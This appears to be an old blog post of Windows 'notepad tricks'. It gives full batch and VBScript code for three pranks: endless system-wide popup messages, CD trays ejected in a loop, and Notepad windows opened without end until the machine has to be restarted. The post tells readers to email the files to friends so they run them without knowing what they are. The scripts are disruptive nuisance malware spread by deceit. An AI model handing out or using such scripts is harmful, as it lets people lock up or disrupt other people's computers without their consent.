1.25.2012

Constantly Repeat Messages in Windows

Using this notepad trick you can annoy anyone and can actually force them to log off or leave the computer (LOL….). This notepad trick will create an infinite cycle of a message in the computer. Follow the steps to know more:

  • Open Notepad.
  • Paste the following code in the notepad file:

@ECHO off

:Begin

msg * Hi

msg * Are you having fun?

msg * I am!

msg * Lets have fun together!

msg * Because you have been o-w-n-e-d

GOTO BEGIN

  • Save the file with any file name but with .bat as extension and close it. For eg. Freakymessage.bat

After saving the file just open it (by double clicking) and see what happens.

Pssstttt……. You can piss of your friends by sending it as an email attachment asking them to try it out !

Open CD Drive Continuosly

Continuously pop out your friend’s CD Drive. If he / she has more than one, it pops out all of them! By seeing the below image I hope you will understand what the below crazy script actually does.



Open Notepad and Type :

Set oWMP = CreateObject(“WMPlayer.OCX.7“)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “cdtray.VBS” and send it.

Note: when you copy the above code and save it in notepad, make the following changes to the first line of code as showed in below screenshot



Type the inverted Commas “ manually by typing through the keyboard.
Double Click it if you wanna see it working. Its a very funny Notepad Trick.

Note: Don’t worry when this crazy notepad trick opens your cd tray continuously. If you want to end this script simply Open Task Manager(Alt+Ctrl+Delete). Under Processes end the process “wscript.exe”

Open Notepad Continuosly

This simple computer prank consists of a code below that will drive your friend crazy as it opens notepad continuously.


When you type the below code and rename it as *.bat it take the above showed icon shape.
To Open Notepad continuously in your friend’s computer:
Type the code in notepad as :



@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


Save it as “notepad.BAT” and send it.
Note: If you want to try it, then go ahead and when you built this file double click to open it. But beware it slows your system and you will be left with no other option than to restart, as this script opens 100’s of notepad window. So, If you want to try this than save all your work and then run this file.